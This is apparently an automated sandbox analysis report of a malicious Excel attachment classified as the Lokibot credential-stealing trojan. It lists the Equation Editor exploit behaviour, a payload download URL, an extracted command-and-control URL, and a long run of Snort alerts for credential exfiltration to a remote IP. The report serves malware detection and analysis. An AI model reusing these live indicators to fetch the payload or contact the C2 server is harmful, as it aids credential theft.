Loading ...

Play interactive tourEdit tour

Analysis Report 20200413_140639.xlsx

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:222987
Start date:16.04.2020
Start time:10:40:57
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 54s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:20200413_140639.xlsx
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Java 8.0.1440.1, Flash 30.0.0.113)
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.expl.evad.winXLSX@5/7@82/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 44.3% (good quality ratio 42.4%)
  • Quality average: 76.6%
  • Quality standard deviation: 29%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Lokibot
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through API1Winlogon Helper DLLAccess Token Manipulation1Disabling Security Tools1Credential Dumping2System Time Discovery2Remote File Copy15Man in the Browser1Data Encrypted1Remote File Copy15Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExploitation for Client Execution13Port MonitorsProcess Injection12Software Packing2Credentials in Registry2Security Software Discovery141Remote ServicesData from Local System2Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesGraphical User Interface1Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureFile and Directory Discovery2Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information21Credentials in FilesSystem Information Discovery34Logon ScriptsClipboard Data1Data EncryptedStandard Application Layer Protocol124SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading1Account ManipulationVirtualization/Sandbox Evasion1Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion1Brute ForceProcess Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskAccess Token Manipulation1Two-Factor Authentication InterceptionRemote System Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionProcess Injection12Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://russchine2wsdyspecial6plumbingjkmaterial.duckdns.org/russdoc/regasm.exeAvira URL Cloud: Label: malware
Found malware configurationShow sources
Source: vbc.exe.2328.4.memstrMalware Configuration Extractor: Lokibot {"c2:": "http://toyo-at-jp.info/ig1/fre.php"}
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BR42M2GZ\regasm[1].exeVirustotal: Detection: 23%Perma Link
Source: C:\Users\user\AppData\Roaming\vbc.exeVirustotal: Detection: 23%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: 20200413_140639.xlsxVirustotal: Detection: 25%Perma Link
Source: 20200413_140639.xlsxReversingLabs: Detection: 26%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vbc.exeJump to behavior
Office Equation Editor has been startedShow sources
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,4_2_00403D74
Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 4_2_004AB84C __getdrive,FindFirstFileExW,__wfullpath_helper,_IsRootUNCName,GetDriveTypeW,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,GetLastError,FindClose,GetLastError,FindClose,4_2_004AB84C

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: russchine2wsdyspecial6plumbingjkmaterial.duckdns.org
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 103.114.106.209:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49158 -> 103.114.106.209:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.2:49161 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49161 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49161 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.2:49161 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.2:49162 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49162 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49162 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.2:49162 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49163 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49163 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49163 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49163 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49164 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49164 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49164 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49164 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49165 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49165 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49165 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49165 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49166 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49166 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49166 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49166 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49167 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49167 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49167 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49167 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49168 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49168 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49168 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49168 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49169 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49169 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49169 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49169 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49170 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49170 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49170 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49170 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49171 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49171 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49171 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49171 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49172 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49172 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49172 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49172 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49173 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49173 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49173 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49173 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49174 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49174 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49174 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49174 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49175 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49175 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49175 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49175 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49176 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49176 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49176 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49176 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49177 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49177 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49177 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49177 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49178 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49178 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49178 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49178 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49179 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49179 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49179 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49179 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49180 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49180 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49180 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49180 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49181 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49181 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49181 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49181 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49182 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49182 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49182 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49182 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49183 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49183 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49183 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49183 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49184 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49184 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49184 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49184 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49185 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49185 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49185 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49185 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49186 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49186 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49186 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49186 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49187 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49187 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49187 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49187 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49188 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49188 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49188 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49188 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49189 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49189 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49189 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49189 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49190 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49190 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49190 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49190 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49191 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49191 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49191 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49191 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49192 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49192 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49192 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49192 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49193 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49193 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49193 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49193 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49194 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49194 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49194 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49194 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49195 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49195 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49195 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49195 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49196 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49196 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49196 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49196 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49197 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49197 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49197 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49197 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49198 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49198 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49198 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49198 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49199 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49199 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49199 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49199 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49200 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49200 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49200 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49200 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49201 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49201 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49201 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49201 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49202 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49202 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49202 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49202 -> 89.208.229.230:80
Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49203 -> 89.208.229.230:80
